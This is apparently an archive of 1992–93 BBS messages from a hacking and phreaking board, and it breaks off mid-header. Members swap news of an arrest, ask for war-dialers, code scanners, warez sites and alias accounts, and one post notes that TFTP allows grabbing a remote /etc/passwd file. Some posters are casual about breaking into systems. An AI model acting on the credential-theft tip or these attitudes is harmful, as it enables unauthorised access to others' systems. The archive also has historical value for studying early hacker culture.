From iceman@yabbs Sun Nov 29 19:57:21 1992 From: iceman@yabbs To: all@yabbs Subject: Hahah Date: Sun Nov 29 19:57:21 1992 Like I mentioned in a previous message, the people in our isolated area (Manitoba,Canada) are easily impressed with hacking. My friend got caught hacking a stupid BBS and made the FRONT PAGE of our newspaper. I sent the article to CUD (I don't know why), I can also send it here if anyone cares... It's really quite funny. This happened about a week ago, and he had his computer and other equipment confiscated. I never thought something like this would come out of hacking a BBS... but I guess they got sick of it after he'd done it 4 times.. Later ICEMAN From blitz@yabbs Mon Nov 30 08:29:58 1992 From: blitz@yabbs To: all@yabbs Subject: Local Hacking Boards Date: Mon Nov 30 08:29:58 1992 Do any of you know any local h/p/w boards? (In Pittsburgh) If you do, would you send the #&nup to me. BTW- If any of you Pittsburghers have been on the Bassalope BBS since its crash a few months ago, I'd like to relogin. Thanx! Blitz From slim@yabbs Sun Jan 17 14:55:48 1993 From: slim@yabbs To: buddha@yabbs Subject: re: tftp Date: Sun Jan 17 14:55:48 1993 Because of it's limited restrictions, and the open access to the etc/passwd file (unlike ftp where the dir etc not the real one), it is easy and possible to snag the passwd file from the remote system. From omc@yabbs Sun Jan 17 22:48:59 1993 From: omc@yabbs To: hbeast@yabbs Subject: re: tftp Date: Sun Jan 17 22:48:59 1993 i snarfed one like that one time that said Try to steal out etc/passwd file eh? � From iceman@yabbs Thu Feb 4 10:54:39 1993 From: iceman@yabbs To: htoaster@yabbs Subject: new scan Date: Thu Feb 4 10:54:39 1993 Is it me, or is the newscan fucked? Just seems odd that i've been re-reading the same messages for the past while. ICEMAN TDR From pez@yabbs Thu Feb 4 11:51:07 1993 From: pez@yabbs To: all@yabbs Subject: re: scanners Date: Thu Feb 4 11:51:07 1993 So, anyone know where to get the latest version of code thief, or any other decent exchange scanner? From lostsoul@yabbs Mon Feb 8 15:07:55 1993 From: lostsoul@yabbs To: ti_dude@yabbs Subject: re: INC ftp site ? Date: Mon Feb 8 15:07:55 1993 I doubt it. Seeing as INC is dead.. heh. I heardthose rumors as well but no one has posted any address's so I would say it's bullshit. From invalid@yabbs Tue Feb 9 15:03:35 1993 From: invalid@yabbs To: houdini@yabbs Subject: re: H & P in 704 Date: Tue Feb 9 15:03:35 1993 toneloc constantly updated my ass.. Mucho and Minor have been in jail for a while and Minor just got out before HoHocon... don't expect any updates soon. >> Invalid Media >> From johndeer@yabbs Sun Feb 21 23:57:30 1993 From: johndeer@yabbs To: ziplock@yabbs Subject: re: INC ftp site ? Date: Sun Feb 21 23:57:30 1993 what are some of these warez ftp sites? i wanna get some new stuff like wordperfect 5.2 and junk like that, but 2400 is a pain on the bbses... john Deere From invalid@yabbs Mon Feb 22 01:07:00 1993 From: invalid@yabbs To: houdini@yabbs Subject: re: Toneloc beta 10 Date: Mon Feb 22 01:07:00 1993 Yeah I'll eat my words.. I recently got intouch with Mucho and Minor and they are back on my system again :) o they uploaded me the new version of TL.. its really a good one too >> Invalid Media >> From bagger@yabbs Thu Feb 25 14:34:21 1993 From: bagger@yabbs To: blitz@yabbs Subject: re: 2600, bookstores Date: Thu Feb 25 14:34:21 1993 What is this "Ice Nine" you mentioned? Is it a bookstore in Pittsburgh? Where is it located exactly, (what part of Pittsburgh) ? -Thanx - bagger From ldistort@yabbs Sun Feb 28 20:27:42 1993 From: ldistort@yabbs To: all@yabbs Subject: toneloc Date: Sun Feb 28 20:27:42 1993 Can anyone FTP a newe version of toneloc (something above .97b) to any anonymous ftp site? Logical Distortion [416] From vitroth@yabbs Mon Mar 1 15:57:14 1993 From: vitroth@yabbs To: all@yabbs Subject: Free internet accounts?? Date: Mon Mar 1 15:57:14 1993 RE the post a while back about free accounts on the net.. if you don't want to go through or whatever try me... login as guest and send me mail (vitroth) give me real name and desired user name (8 chars or less of course... I can't enforce real name but at least make it reasonable... I'll try to get most accounts set up within 24 hours... don't forget to give me an initial password too... at this point accounts will be given out with no restrictions... IF I get too many requests I may discontinue that. NOTE: I do not have a modem hooked up.. so no dial in/out -Vit � From spectre@yabbs Thu Mar 11 11:51:36 1993 From: spectre@yabbs To: buddha@yabbs Subject: re: 2600 in pgh Date: Thu Mar 11 11:51:36 1993 In message re: 2600 in pgh, buddha said: > Someone asked about getting BBS softs from the net? I found a pretty good > place, shit, can't remember. It was maybe Or something in > oakland, anyhow. Look around, they had ALOT. is a simtel20 mirror - pretty much 'the' definitive shareware/freeware/pd msdos site. there are others, but none with the amount and variety. there's also - they mirror alot of the sites (simtel, garbo, cica, ulowell & others). � From jasonlee@yabbs Fri Mar 12 11:02:33 1993 From: jasonlee@yabbs To: johndeer@yabbs Subject: re: 2600 in DC Date: Fri Mar 12 11:02:33 1993 I wasn't really talking to him much, cuz I still don't know that many people (and I'm sorta shy :). It was pretty fun, though. I was also talking to ntstriker and monk, I guess. I don't really need any numbers, because I can't really call LD to DC. Thanks anyway... JasonLee From christj@yabbs Sat Apr 10 22:11:58 1993 From: christj@yabbs To: ziplock@yabbs Subject: re: 703 dialout Date: Sat Apr 10 22:11:58 1993 In message re: 703 dialout, ziplock said: > Or of course you could go get 386BSD and go buy some 4.3BSD manuals from > your local computer store....� Yepo... Or just d/l Linux. Heard that it isn't too aweful hard to instzll, but that it does take up a hell of a lotr of resources. � From mintent@yabbs Sat Apr 10 22:55:36 1993 From: mintent@yabbs To: all@yabbs Subject: Propaganda Date: Sat Apr 10 22:55:36 1993 Hey, everyone call Propaganda at (612) 379-1517 612's underground headquarters / NO NUP - Malicious Intent From hbeast@yabbs Sun Apr 11 03:36:25 1993 From: hbeast@yabbs To: comrade@yabbs Subject: re: 703 dialout Date: Sun Apr 11 03:36:25 1993 In message re: 703 dialout, comrade said: > I am looking for a bbs software that runs on a dos platform (i.e. has an > .exe) file, but ooks like the unix os. I want this because I am not > wasting my 486 on running unIx, but if I run unix as a bbs, the clueless > fucks will stay away. Unix is very intimidating. unIx --> Fucked up > caps from warez relapse. Anyways, please help me out. thanks If anyone doesn't like Unix the internet police will get him ;). Just so. try the Waffle DOS version (you don't have to pay to get it!). It's not exactly Unix, but it's better than nothing. And you can also look at MindVox and drool a little on what you can do with the Waffle source.. hbeasT � From deprogra@yabbs Sun Apr 11 03:47:13 1993 From: deprogra@yabbs To: guinar@yabbs Subject: re: 703 dialout Date: Sun Apr 11 03:47:13 1993 That's what I do. Use prodigy or something else reliable like Sprintnet. These numbers are never busy, work on many speeds, and ways of getting them are too numerous to mention here. It looks like we might have an 804 dialout ... From pegasus@yabbs Sun Apr 11 07:42:44 1993 From: pegasus@yabbs To: fatdog@yabbs Subject: re: Text Based Hack BBS's in OZ Date: Sun Apr 11 07:42:44 1993 I'm interested in all the information you ask for, especially the lateste 40-hex mag, other viral info and perhaps some warez sites. Please send me any info directly to my e-mail address which is : I believe that the message might be killed if you post it here. -pegasus From pegasus@yabbs Sun Apr 11 07:49:06 1993 From: pegasus@yabbs To: all@yabbs Subject: re: 703 dialout Date: Sun Apr 11 07:49:06 1993 > Yepo... Or just d/l Linux. Heard that it isn't too aweful hard to instzll, > but that it does take up a hell of a lotr of resources. Sure, it takes some resources, but you can get it working with a 386sx, 2MB ram, and 4MB disk space, the amount of utils is up to you. And after all, you wan't need that blasted DOS thing anymore. From pegasus@yabbs Sun Apr 11 07:56:46 1993 From: pegasus@yabbs To: all@yabbs Subject: PC-speaker music Date: Sun Apr 11 07:56:46 1993 Hi, all. I'm looking for information on how to play a sample , or preferably MOD files and such through the PC-speaker. There are some library routines around that does the job for you, but I would prefer to know the tecnique involved. Seems like I have to reprogram the timer-chip of the PC, but unfortunately I have no on-line info on this. Any hints or source-code would be appreciated. -pegasus From htoaster@yabbs Sun Apr 11 10:20:49 1993 From: htoaster@yabbs To: pegasus@yabbs Subject: re: 703 dialout Date: Sun Apr 11 10:20:49 1993 4mb of disk space won't get you must in linux or bsd. With both that will give you a kernel and a few file system utils. Linux is a little smaller (not as much as is advertised by everyone though), but I would tend to reccomend 386bsd to newbies because there are so many books on bsd (and 386bsd is pretty much straight bsd4.3 with some posix thrown in). It also tends to be easier to keep up with, just install a new patch kit when one comes out. You don't have to deal with a new kernel every 5 days or whatever. The best idea is to always install both, play around, and decide which one you like best. htoaster � From mintent@yabbs Sun Apr 11 23:12:16 1993 From: mintent@yabbs To: all@yabbs Subject: Wanted Date: Sun Apr 11 23:12:16 1993 ** NOTEBOOK WANTED ** Cheap 286/386 - Nothing fancy would like it to have : battery power, 3.5" 1.44 drive, 1MB RAM, at least a 20MB Hard Disk, Serial and parallel ports, but these specs. aren't set in stone. Please leave mail to : Malicious Intent From hankster@yabbs Mon Apr 12 01:29:07 1993 From: hankster@yabbs To: deprogra@yabbs Subject: re: 703 dialout Date: Mon Apr 12 01:29:07 1993 What do you mean.. "That's what I do."?..You mean calling up oh another system and using their dialouts? Such as Telenet? I've had a few dialouts on in Canada one in Germany, but do you mean calling up on these networks and accessing internet - then using the internet dialouts r what? NEways if you guys would like a BBS list for some of the 804 area let me know and I'll post some.. Later Hankster From comrade@yabbs Mon Apr 12 16:17:31 1993 From: comrade@yabbs To: htoaster@yabbs Subject: re: 703 dialout Date: Mon Apr 12 16:17:31 1993 waffle blows to high hell. Yeh, I have a copy of coherent, and its teledisked and for the likes of me, I cannot unteledisk it! Will check it. thanks again . From wincroft@yabbs Tue Apr 13 22:44:07 1993 From: wincroft@yabbs To: pegasus@yabbs Subject: re: PC-speaker music Date: Tue Apr 13 22:44:07 1993 If you are looking for a program to play MOD files through the pc speaker the program you are looking for is Mod-edit version 3.X . i belive the author may be able to direct you to where he found his code to translate to the pc speaker. From greywolf@yabbs Tue Apr 13 23:15:06 1993 From: greywolf@yabbs To: all@yabbs Subject: hack sites Date: Tue Apr 13 23:15:06 1993 Being a new hacker (on internet anyways :) ) I was wondering if there were any paricular places I should check out (other then well and phantom of course)..And I heard mention of cracking groups having there own ftp sites on telnet? Interesting..anyone got an address or two they could post, I'd like to see how they're set up....oh yes, are there any systems that happen to be offering free e-mail addresses (and preferably internet access as well for ftp and telnet)..I have all that now, but it's under my real name, and I'd like to have one for my 'alter-ego' so to speak. Well, ta ta, and hack on mates! Lemmon Curry ? From pegasus@yabbs Wed Apr 14 05:20:41 1993 From: pegasus@yabbs To: all@yabbs Subject: Streamers Date: Wed Apr 14 05:20:41 1993 Just found the source code for a program that plays the famous mushroom through the speaker, but now another more important request. I've got a Summit 250 MB tape streamer that I'd like to talk to, but I can't find any info on how to do it. Formats such as the QIC-80 and similar specs would also be of ultimate interest. If your answer is to big, please respond directly to ( From johndeer@yabbs Wed Apr 14 09:39:35 1993 From: johndeer@yabbs To: htoaster@yabbs Subject: bbs Date: Wed Apr 14 09:39:35 1993 So is there a way I could compile, for instance, Yabbs to run in DOS? My workstation here is Dos, but it does have a direct internet connection, so I could conceivable run a telnet BBS of it.. but obviously most PC modem BBS software doesn't deal with any ports... john Deere From htoaster@yabbs Wed Apr 14 10:30:26 1993 From: htoaster@yabbs To: johndeer@yabbs Subject: re: bbs Date: Wed Apr 14 10:30:26 1993 In message bbs, johndeer said: > So is there a way I could compile, for instance, Yabbs to run in DOS? My > workstation here is Dos, but it does have a direct internet connection, so > I could conceivable run a telnet BBS of it.. but obviously most PC modem > BBS software doesn't deal with any ports... Not really. Yabbs doesn't do any of the network stuff on its own (it lets telnetd do that). What sort of cpu do you have? One suggestion would be to put on a real small linux setup (like 15 megs), and run yabbs on that, and when you want to do dos stuff just leave the bbs down. htoaster � From cse@yabbs Wed Apr 14 13:51:35 1993 From: cse@yabbs To: greywolf@yabbs Subject: re: hack sites Date: Wed Apr 14 13:51:35 1993 A good place to get an email account with your alias, is its.... <- its free and they have usenet and telnet , just apply and get in... PS> please let me know if you find any hack sites.. I too am a new hacker on I net and would really like some... Thanks in advance... Chainsaw Enema From reaper@yabbs Wed Apr 14 16:02:59 1993 From: reaper@yabbs To: all@yabbs Subject: .au files to MOD files Date: Wed Apr 14 16:02:59 1993 I'd like to know if there's a utility to convert .au files (sun audio format) to .mod? I'd appreciate it. Thanks in advance . . . >> The Reaper << � From mephisto@yabbs Thu Apr 15 10:57:52 1993 From: mephisto@yabbs To: reaper@yabbs Subject: re: .au files to MOD files Date: Thu Apr 15 10:57:52 1993 No, you can't convert .au files to .MOD, because they're completely different types of files. You CAN convert .au to .VOC files though. AU, VOC, SND, etc files are digitized sound. Physical samples., while MOD files are sampled instruments played in different octaves, keys, etc. For the AU2VOC converter, look in under /pub/tmbg/samples Mephistopheles From johndeer@yabbs Thu Apr 15 15:06:55 1993 From: johndeer@yabbs To: htoaster@yabbs Subject: re: .au files to MOD files Date: Thu Apr 15 15:06:55 1993 I run a 486/33.. but I dont' want to run unix on it, cause I'll be using DOS and windows all day.. if there was a way I could get it to run it in windows or something.. actually I'll see if I can get a server to do it.. then it'll be a 486dx50 w/ 32megs and lots HD space... john Deere From hiro@yabbs Fri Apr 16 00:53:22 1993 From: hiro@yabbs To: mintent@yabbs Subject: re: Propaganda Date: Fri Apr 16 00:53:22 1993 Hahaha funny to see you here... From greywolf@yabbs Fri Apr 16 00:57:24 1993 From: greywolf@yabbs To: cse@yabbs Subject: re: hack sites Date: Fri Apr 16 00:57:24 1993 I certainly will keep you informed with anything I find out..hopefully together we could beet the system and actually give ourselves some recognition in the internet world...I'm a hacker in the 'real' world but I am stillnew to any case, you should try to get on IRC and join the hack confrence...if your not allready on, try the IRC gainable from They'll let you on after the sysop look you up (just presses a key to validate you actually). if you've got another gateway to IRC could you post it..thanks! From hiro@yabbs Fri Apr 16 01:02:53 1993 From: hiro@yabbs To: all@yabbs Subject: Packet Snooping Date: Fri Apr 16 01:02:53 1993 I am interested in packet-snooping on a Sparcstation network. What software is required for this, and where might I FTP it from? I also wonder how I would "piggyback" onto an ethernet with a laptop Mac. Thanks. Hiro612 From mintent@yabbs Fri Apr 16 01:47:10 1993 From: mintent@yabbs To: hiro@yabbs Subject: addresses Date: Fri Apr 16 01:47:10 1993 Does anyoneknow of any places that one is able to get a free UNIX account? I have tried the place.. while being pretty generous, they ask for all kinds of ID and shit.. he's also paranoid about hackers. Where does one have to go these days? From mintent@yabbs Fri Apr 16 01:59:32 1993 From: mintent@yabbs To: cse@yabbs Subject: Date: Fri Apr 16 01:59:32 1993 what's up with the ?? They say that you have to be affiliated with the institute or some bullshit like that.. what did you tell them ? From cse@yabbs Fri Apr 16 13:00:42 1993 From: cse@yabbs To: greywolf@yabbs Subject: re: hack sites Date: Fri Apr 16 13:00:42 1993 Ok.. I'll try that site.. I hav had no luck with any other sites.. If i hear anything, I'll post... Storm the reality studio.. Take back the universe.... cse From cse@yabbs Fri Apr 16 13:02:06 1993 From: cse@yabbs To: mintent@yabbs Subject: re: addresses Date: Fri Apr 16 13:02:06 1993 try my favorite watering hole... no charge.. telnet.. mail account..usenet feed.. and much more.. cse From cse@yabbs Fri Apr 16 13:03:25 1993 From: cse@yabbs To: mintent@yabbs Subject: re: Date: Fri Apr 16 13:03:25 1993 please disregard the last message... just one piece of advice... BULLSHIT>.. I am not affiliated with it, nor are most of the other people ther... I will look in to it and let you know... Chainsaw Enema (CSE) From cse@yabbs Fri Apr 16 13:09:33 1993 From: cse@yabbs To: mintent@yabbs Subject: re: Date: Fri Apr 16 13:09:33 1993 did you login as :bbs ? that takes you to a bbs menu.. fill out the account part and then logoff, adn then back on (I believe ) sorry if I left that out Chainsaw Enema From beaker@yabbs Fri Apr 16 17:19:57 1993 From: beaker@yabbs To: all@yabbs Subject: ... Date: Fri Apr 16 17:19:57 1993 what really sucks [i think] is that bradenville went down.. heh. for us ppl that do not have irc acs it was a god. oh well, anyone know of other public irc/unix sites? i have tried some that were posted prior in this base, but some are just plain lame.. any one?� From jasonlee@yabbs Fri Apr 16 17:50:12 1993 From: jasonlee@yabbs To: reaper@yabbs Subject: re: .au files to MOD files Date: Fri Apr 16 17:50:12 1993 Nope, there's no way, really. .MOD files are not sampled digital sound (although they use such samples as instruments. The .MOD file is basically just code that contains patterns and such. I think sound files have to be similar in format to convert them. JasonLee From houdini@yabbs Fri Apr 16 22:00:24 1993 From: houdini@yabbs To: all@yabbs Subject: Santafe Date: Fri Apr 16 22:00:24 1993 Santafe should not be used as you are sugesting, it's main perpose is to serve people interested in Complex systems. If it is abuse the Administrator will take it down. From vapor@yabbs Fri Apr 16 22:55:00 1993 From: vapor@yabbs To: uufnord@yabbs Subject: re: scanning the net Date: Fri Apr 16 22:55:00 1993 Now how would you go about scanning the net? I dont have a scripting Comm proggy (yet.. :( ) From mintent@yabbs Sat Apr 17 03:22:09 1993 From: mintent@yabbs To: cse@yabbs Subject: re: Date: Sat Apr 17 03:22:09 1993 yeah, i figured that one out.. i filled out the forms, etc.. but i still cannot logon.. i call back and the shit won't work from the main prompt. oh well, i will try it again today. From ducky@yabbs Sat Apr 17 14:12:18 1993 From: ducky@yabbs To: all@yabbs Subject: free access et al. Date: Sat Apr 17 14:12:18 1993 just to enlighten some people a little perhaps about why free access via bbses and such to irc & other fun stuff it becoming harder and harder to get. . . basically, it's because stupid people are hacking these systems! this is true for nyx & for several other sites! as more and more members of the public (and thus the bbs hacking community) are getting access to the internet, they are fucking things up for the rest of us. . . the internet is a whole different world from bbses. . .it may be cool on bbses to try to hack stupid systems, because if the sysop figures out that people are hacking his system, he'll just fix it. . .no big loss since the system was prolly not worth using at all anyway. . . but hacking sites which give out free accounts on the internet? come on folks, it doesn't take half a brain to realize that THIS IS A USEFUL SERVICE! hacking these systems, or using them to hack other places is just gonna result in tighter access. . . KD From weezal@yabbs Sun Apr 18 00:34:23 1993 From: weezal@yabbs To: reaper@yabbs Subject: re: .au files to MOD files Date: Sun Apr 18 00:34:23 1993 No, there is not. From jasonlee@yabbs Sun Apr 18 12:18:16 1993 From: jasonlee@yabbs To: all@yabbs Subject: hacking? Date: Sun Apr 18 12:18:16 1993 Hmmm...I've been thinking about this, and there's really no way I would consider myself a hacker. I'd rather be more of an internaut, exploring all the neat little nooks and crannies of this strange place. If I have to break into a couple systems to continue exploring, then so be it. I just want to snoop around and discover what is to be found. Does anyone have any idea how long it would take to scan every i-net address? Assume that you have 100Mbps bandwidth, and there's adresses. That's about 1 trillion addresses...we really know that there probably aren't any places, but it is possible that someone (maybe someone big) could have hidden their site out in that wasteland (like the telcos do with 555-99xx). Anyone want to scan that area? JasonLee From skippy@yabbs Sun Apr 18 15:43:15 1993 From: skippy@yabbs To: jasonlee@yabbs Subject: re: hacking? Date: Sun Apr 18 15:43:15 1993 In message hacking?, jasonlee said: > Does anyone have any idea how long it would take to scan every i-net > address? Assume that you have 100Mbps bandwidth, and there's > adresses. That's about 1 trillion addresses...we really > know that there probably aren't any places, but it is > possible that someone (maybe someone big) could have hidden their site out > in that wasteland (like the telcos do with 555-99xx). Anyone want to scan well, there isnt address out there... the current IP addressing scheme is only 32 bits.. so if you notice, you wont find an address 276.234.500.4 wont happen.... and i agree with you on the internaut bit.... i just wanna go and look around at everything on the internet.... i'm not much for breaking into sites so i guess i'm nowhere near hacker status... speaking of hackers, have any of you taken the Hackers Test... its not really about hacking as we know it, just about obscure knowledge of computerdom... if anyone wants it, leave me yer e-mail address, i'll mail it too ya... --skip � From mohawk@yabbs Sun Apr 18 17:33:26 1993 From: mohawk@yabbs To: skippy@yabbs Subject: re: hacking? Date: Sun Apr 18 17:33:26 1993 Skippy, I'd be interested in looking at the hacker's test, please email me a copy at thanx. mohawk From arken@yabbs Sun Apr 18 21:57:50 1993 From: arken@yabbs To: all@yabbs Subject: Blah Date: Sun Apr 18 21:57:50 1993 Has anyone out there seen or heard of a program called Mr. Kraker? From pyro@yabbs Mon Apr 19 01:00:27 1993 From: pyro@yabbs To: all@yabbs Subject: HP Network... Date: Mon Apr 19 01:00:27 1993 I am interested in starting/joining a national net for HP orientated boards and similar discussions (legalities, ethics, netowkring, etc...). If anyone has any interest in starting one, or any info on existing ones please send me mail eithere here or: -Pyro/Propaganda From johndeer@yabbs Mon Apr 19 12:02:15 1993 From: johndeer@yabbs To: hiro@yabbs Subject: re: HP Network... Date: Mon Apr 19 12:02:15 1993 as for ethernet on a mac laptop (i'll assume you're talking about a powerbook then). You can get a twisted-pair ethernet card for the MAc, and you can also get a 10base2 ethernet card for the mac. It's not that hard, the only problem you'll have is a lack of internal expansion slots on powerbooks. I assume it is also available externally, but i'm really not sure. I guess you could plug it into the modem port. If you've gort got a bunch of macs, get a Farallon card for Pc-Localtalk, and make your pc-server also a node on an appletalk network. If you have multiple appletalk nodes, this is best, because an appletalk network is much cheaper than an ethernet network (appletalk uses standard, radio-shack grade modular phone wire). speed will suffer, but it's all a cost-use analysis. john Deere From cse@yabbs Mon Apr 19 14:24:56 1993 From: cse@yabbs To: skippy@yabbs Subject: re: hacking? Date: Mon Apr 19 14:24:56 1993 I'll bit.. I am curious about the hacking test.. Im an old school non destructive type.. and a history buff... email it to thanx, cse From cse@yabbs Mon Apr 19 14:26:35 1993 From: cse@yabbs To: pyro@yabbs Subject: re: HP Network... Date: Mon Apr 19 14:26:35 1993 say pyro.. I would be interested too...please poost it here or mail more info to thannx, cse From beaker@yabbs Mon Apr 19 16:12:34 1993 From: beaker@yabbs To: all@yabbs Subject: ... Date: Mon Apr 19 16:12:34 1993 hey pyro, or UO. :) anyway, it would seem that a lot of ppl from propaganda have made it onto here. like myself, malicious intent, and i think that hiro[shima] is around here somewhere too. heh. � From christj@yabbs Mon Apr 19 18:17:27 1993 From: christj@yabbs To: skippy@yabbs Subject: hack test Date: Mon Apr 19 18:17:27 1993 heyo... mail me the hack test Thanks... � From binkley@yabbs Mon Apr 19 19:19:16 1993 From: binkley@yabbs To: pez@yabbs Subject: re: scanners Date: Mon Apr 19 19:19:16 1993 I've got CodeThief 5.1 You can get it from 2o7-562-9226 From lordcybr@yabbs Mon Apr 19 20:21:34 1993 From: lordcybr@yabbs To: pez@yabbs Subject: re: scanners Date: Mon Apr 19 20:21:34 1993 Code thif can be obtained at a BBs call Rune Stone the # is 203) 832-8441 it may take a couple of days to get access but it has a great selection. Artimage.- From greywolf@yabbs Mon Apr 19 20:21:50 1993 From: greywolf@yabbs To: pyro@yabbs Subject: re: HP Network... Date: Mon Apr 19 20:21:50 1993 I'm always interetested in aiding hacking and phreaking. How can I be of service? From lordcybr@yabbs Mon Apr 19 20:23:25 1993 From: lordcybr@yabbs To: ti_dude@yabbs Subject: re: INC ftp site ? Date: Mon Apr 19 20:23:25 1993 One question, what does INC stand for, and could you give me the FTP site #? Thanks, Artimage.- From lordcybr@yabbs Mon Apr 19 20:25:50 1993 From: lordcybr@yabbs To: all@yabbs Subject: re: AlchemyNet Date: Mon Apr 19 20:25:50 1993 I would love to get on your net, but my bbs is not up yet, maybe in a week. If ya could give me some info I would be very grateful. Thanks, Artimage.- From htoaster@yabbs Mon Apr 19 21:24:06 1993 From: htoaster@yabbs To: all@yabbs Subject: hackers test Date: Mon Apr 19 21:24:06 1993 If you ftp the hacker test to my machine in the /incoming directory I will put it only in the gfiles area online and make it available for ftp (as everything in the gfiles area is). This goes for anything that you find of interest (as long as I have the disk space). Hopefully next semester I will have another 200 megs online, and about 50 of that will probably be dedicated to the ftp site (I am planning on mirroring more of, and hopefully I'll get a bit of that indexed under the gfiles server). htoaster � From skippy@yabbs Mon Apr 19 21:40:58 1993 From: skippy@yabbs To: all@yabbs Subject: re: hackers test Date: Mon Apr 19 21:40:58 1993 ok..... i uploaded the hackers test to phred.... look for it soon.... --skip � From tau@yabbs Mon Apr 19 23:55:33 1993 From: tau@yabbs To: skippy@yabbs Subject: re: hacking? Date: Mon Apr 19 23:55:33 1993 Hi Any test doc's sound interesting, so if you would Email me i'll be glad... \tau *smile* From fatdog@yabbs Tue Apr 20 00:11:15 1993 From: fatdog@yabbs To: binkley@yabbs Subject: re: scanners Date: Tue Apr 20 00:11:15 1993 Binks, Any chance of grabbin codethief 5.1??? I've got 2.1 but it's too old. CaN ACCEPT UUENCODED email. FatDog. From skippy@yabbs Tue Apr 20 03:48:26 1993 From: skippy@yabbs To: all@yabbs Subject: hacker test Date: Tue Apr 20 03:48:26 1993 o.k.. now that i have sent the test to phred, i am not gonna send it out anymore unless you have no ftp access..... please send me mail here... thanx... --skip � From pyro@yabbs Tue Apr 20 06:20:17 1993 From: pyro@yabbs To: greywolf@yabbs Subject: re: HP Network... Date: Tue Apr 20 06:20:17 1993 I am thinking of either trying to start a new one, or get hooked up with an existing one. If you have any info on existing onesI would be very grateful. As for starting one, I am all for that as well. Do you run a BBS? If so send me some mail and we will get some details worked out. I have a few ideas, but I am by no means going to be the 'ruler' of such a thing, everyone who wants to help out has a say in my book. You can reach me here or send mail to: -Pyro From htoaster@yabbs Tue Apr 20 10:05:57 1993 From: htoaster@yabbs To: skippy@yabbs Subject: re: hackers test Date: Tue Apr 20 10:05:57 1993 In message re: hackers test, skippy said: > ok..... i uploaded the hackers test to phred.... > > look for it soon.... Its up. You can get to it in the gfiles area under the misc text area, or from ftp in /pub/text/hackertest.Z. htoaster � From swerve@yabbs Tue Apr 20 13:26:00 1993 From: swerve@yabbs To: all@yabbs Subject: fsp sites Date: Tue Apr 20 13:26:00 1993 hey, me here lookin' to trade some fsp sites with some people. From liqjesus@yabbs Tue Apr 20 15:13:04 1993 From: liqjesus@yabbs To: lordcybr@yabbs Subject: re: scanners Date: Tue Apr 20 15:13:04 1993 Just curious..are you calling from CT (that's where the Rune Stone is located)? I'm interested in hunting down more h/p/a boards in the state. I used to be on Piper's Pit but I lost track of the new phone number. Any info would be appreciated. -Liquid Jesus- From lordcybr@yabbs Tue Apr 20 16:00:14 1993 From: lordcybr@yabbs To: liqjesus@yabbs Subject: Ct bbs's Date: Tue Apr 20 16:00:14 1993 > Just curious..are you calling from CT (that's where the Rune Stone is No, I am not. It is an ld call to me, but if you log onto that I'm sure that there is a list of boards in the local area. If you do decide to log onto Rune Stone I will leave ya a message, I use my New handle on that board. Lord Cyber.- � From greywolf@yabbs Tue Apr 20 20:22:22 1993 From: greywolf@yabbs To: pyro@yabbs Subject: re: HP Network... Date: Tue Apr 20 20:22:22 1993 Unfortunately I don't run a bbs (definately not one hooked up to internet)..but I have sufficeint time and interest to help in furthering the corruption of the usefullnes of internet :). From greywolf@yabbs Tue Apr 20 20:24:00 1993 From: greywolf@yabbs To: all@yabbs Subject: fsp Date: Tue Apr 20 20:24:00 1993 Where can I get a copy of this? and some docs on how to abuse..ahh..use it..thanks GREY WOLF p.s., if possible could it just be upped here? From htoaster@yabbs Tue Apr 20 22:53:27 1993 From: htoaster@yabbs To: greywolf@yabbs Subject: re: fsp Date: Tue Apr 20 22:53:27 1993 In message fsp, greywolf said: > Where can I get a copy of this? and some docs on how to abuse..ahh..use > it..thanks > > GREY WOLF > p.s., if possible could it just be upped here? At this point I would rather not have binaries online, mostly due to my lack of disk space. Hopefully this will change next year... htoaster � From mohawk@yabbs Wed Apr 21 01:40:01 1993 From: mohawk@yabbs To: skippy@yabbs Subject: re: hacking? Date: Wed Apr 21 01:40:01 1993 skippy, thanks for sending me the hackers test, I found a test more oriented toward the h/p area called the cracker.test, I just ftp'd it here so it should be available here in a few days for you all to enjoy. mohawk From nmn@yabbs Wed Apr 21 01:51:50 1993 From: nmn@yabbs To: all@yabbs Subject: WTF Date: Wed Apr 21 01:51:50 1993 What the fuck?! A hacker test?! What demented idiotic person came up with such a thing?! This isnt a WaR3z community, or I would at least hope not.. However if people are going around taking hack tests to see how good of a 'hacker' they are, then, well, it looks like a portion of it is moving towards warezzz (Yeah, like it hasn't already?!). Whatever.. thats idiotic.. But, anyway, Yeah, I am the author of Autoscan, and I really couldnt care who gets it... Well, yes I care.. but I let the people pass it around and to use their best judgement on who should get it.... Not like it really matters I guess sence these days every other 13 year old is scanning like mad and not knowing what theyre doing (not saying all of them dont know what theyre doing) and either fuck up systems or thier 'idol' (you know, one of those fuckheads like albatross who enslaves lamers to do his dirty work) goes around destroying shit... Its funny how these type of people never get caught either... makes me fucking sick. Anyway.. thats all from me for now, i have programming to do. NoMeansNo From skippy@yabbs Wed Apr 21 03:31:28 1993 From: skippy@yabbs To: nmn@yabbs Subject: re: WTF Date: Wed Apr 21 03:31:28 1993 In message WTF, nmn said: > What the fuck?! A hacker test?! What demented idiotic person came up > with such a thing?! This isnt a WaR3z community, or I would at least hope > not.. However if people are going around taking hack tests to see how good > of a 'hacker' they are, then, well, it looks like a portion of it is > moving towards warezzz (Yeah, like it hasn't already?!). well, nmn..... if you take the bother to read my original post... you will read that i said if was more of a test to test your knowledege of computerdom, not how to hack it.... its a test to see what kind of a nerd you are!! not how easy you can crack systems... so why dont you read a bit more carefully next time... instead of cussing us all out... thank you --skip � From tau@yabbs Wed Apr 21 04:30:55 1993 From: tau@yabbs To: swerve@yabbs Subject: re: fsp sites Date: Wed Apr 21 04:30:55 1993 In message fsp sites, swerve said: > hey, me here lookin' to trade some fsp sites with some people. > Hi i have got the 930418 sitelist, so if you have any thing beside thet i wouls be interested! \tau� From tau@yabbs Wed Apr 21 05:02:05 1993 From: tau@yabbs To: greywolf@yabbs Subject: re: fsp Date: Wed Apr 21 05:02:05 1993 In message fsp, greywolf said: > Where can I get a copy of this? and some docs on how to abuse..ahh..use > it..thanks You can get et from me! as i said yesterday, just tall me by email or here, where to put it... Ps: it is the 266.4 version !� From tau@yabbs Wed Apr 21 05:05:53 1993 From: tau@yabbs To: mohawk@yabbs Subject: fsp Date: Wed Apr 21 05:05:53 1993 I have sadly, sent you the wrong version of fsp, if you have not got the new one by now, just call, and i'll corect the problem... \tau� From cse@yabbs Wed Apr 21 14:03:28 1993 From: cse@yabbs To: greywolf@yabbs Subject: re: HP Network... Date: Wed Apr 21 14:03:28 1993 me to... What can I do? Chainsaw Enema From nstriker@yabbs Wed Apr 21 14:15:50 1993 From: nstriker@yabbs To: 